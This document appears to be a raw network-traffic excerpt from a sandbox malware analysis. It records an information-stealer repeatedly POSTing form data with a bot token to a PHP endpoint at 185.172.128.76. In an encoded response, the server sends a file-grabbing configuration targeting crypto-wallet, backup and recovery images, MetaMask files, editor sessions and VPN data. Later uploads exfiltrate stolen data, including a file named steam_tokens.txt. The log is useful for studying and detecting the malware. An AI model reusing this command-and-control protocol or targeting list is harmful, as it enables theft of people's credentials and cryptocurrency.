                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 2d 2d 0d 0a
                                                                                                                                                                                                                            Data Ascii: ------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="message"files------DGHDHIDGHIDGIECBKKJJ--
                                                                                                                                                                                                                            Apr 26, 2024 23:09:21.154694080 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:21 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 2052
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBN [TRUNCATED]
                                                                                                                                                                                                                            Apr 26, 2024 23:09:21.189713001 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJK
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:21.568397045 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:21 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:21.700697899 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFC
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:22.076128960 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:21 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:22.086433887 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DGCBAFIJDGHCAKECAEGC
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:22.463145971 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:22 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:22.468420029 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KFCFIEHCFIECBGCBFHIJ
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:22.851068020 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:22 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:22.857799053 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GHIJJEGDBFIIDGCAKJEB
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:23.232513905 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:23 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:26.543777943 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FHJKKECFIECAKECAFBGC
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:26.924586058 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:26 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:27.150188923 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KKFBAAFCGIEGDHIEBFII
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:27.527470112 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:27 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:27.554979086 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBF
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:27.933413982 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:27 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:28.000318050 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KKFBAAFCGIEGDHIEBFII
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:28.375493050 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:28 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:28.380678892 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFI
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:28.760996103 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:28 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:28.766423941 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----BFBFBFIIJDAKECAKKJEH
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:29.143820047 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:29 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:29.270163059 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJ
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:29.653620005 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:29 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:31.173670053 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDG
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:31.558048010 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:31 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:31.940023899 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IIDHJDGCGDAAKEBGDBKF
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:32.333081007 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:32 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:32.339494944 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----AFIEGCAECGCAEBFHDHIE
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:32.714597940 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:32 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:32.721139908 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJ
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:33.093175888 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:32 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:33.111716986 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----ECFCBFBGDBKJKECAAKKF
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:33.491712093 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:33 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:33.500473976 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JEHJKJEBGHJJKEBGIECA
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:33.880763054 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:33 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:33.888151884 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDB
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:34.281394958 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:34 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:35.771856070 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----BFBFBFIIJDAKECAKKJEH
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:36.147408962 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:36 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:36.464536905 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJ
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:36.840259075 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:36 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:36.852209091 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----AEHDAKFIJJKKEBGDBAAK
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:37.223527908 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:37 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:37.240267038 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IEHDBAAFIDGDAAAAAAAA
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:37.618587971 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:37 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:37.832549095 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAF
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:38.210105896 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:38 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:38.233884096 CEST564OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IEHDBAAFIDGDAAAAAAAA
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 363
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: ------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="file"------IEHDBAAFIDGDAAAAAAAA--
                                                                                                                                                                                                                            Apr 26, 2024 23:09:38.614675999 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:38 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:38.725742102 CEST204OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJ
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 124911
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
